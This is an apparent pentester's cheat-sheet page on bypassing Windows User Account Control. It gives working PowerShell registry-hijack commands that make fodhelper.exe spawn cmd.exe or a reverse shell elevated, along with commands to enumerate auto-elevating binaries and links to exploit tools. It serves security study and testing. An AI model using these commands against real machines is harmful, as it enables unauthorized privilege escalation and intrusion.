⭕UAC Bypass

FuzzySecurity | Anatomy of UAC Attacks

Bypassing Windows User Account Control (UAC) and ways of mitigationGreyHatHacker.NET

GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub

some executables can auto-elevate, achieving high IL without any user intervention. This applies to most of the Control Panel’s functionality and some executables provided with Windows.

x86–32/x64 Windows 7/8/8.1/10 (client, some methods, however, works on server version too).Admin account with UAC set on default settings required.

condition to meet auto-elevate:

• The executable must be signed byt the windows publisher

• The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/\

• Executable files (.exe) must declare the autoElevate element inside the manifests.

• sigcheck tool can be used to view the manifest for autoelevate privileges

Fodhelper

Fodhelper.exe is one of Windows default executables in charge of managing Windows optional features, including additional languages, applications not installed by default, or other operating-system characteristics. Like most of the programs used for system configuration, fodhelper can auto elevate when using default UAC settings so that administrators won’t be prompted for elevation when performing standard administrative tasks. While we’ve already taken a look at an autoElevate executable, unlike msconfig, fodhelper can be abused without having access to a GUI.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd> fodhelper

Spaw anything:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'your-reverse-shell' -Force

UAC Bypass – FodhelperPenetration Testing Lab

First entry: Welcome and fileless UAC bypasswinscripting.blog

UAC-bypass/FodhelperBypass.ps1 at master · winscripting/UAC-bypassGitHub

using metasploit:

Add Windows 10 Bypassuac fodhelper module by alexmaloteaux · Pull Request #8434 · rapid7/metasploit-frameworkGitHub

Other ways

GitHub - FULLSHADE/Auto-Elevate: Escalate from a low-integrity Administrator account to NT AUTHORITY\SYSTEM without an LPE exploit by combining a COM UAC bypass and Token ImpersonationGitHub

find auto-elevating applications on windows 10:

# 64 bit apps
Get-ChildItem "C:\Windows\System32\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>"

# 32 bit apps
Get-ChildItem "C:\Windows\SysWOW64\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>"

eventvwr.exe & Registry Hijacking

“Fileless” UAC Bypass Using eventvwr.exe and Registry Hijackingenigma0x3

TpmInit.exe

Bypassing User Account Control (UAC) using TpmInit.exe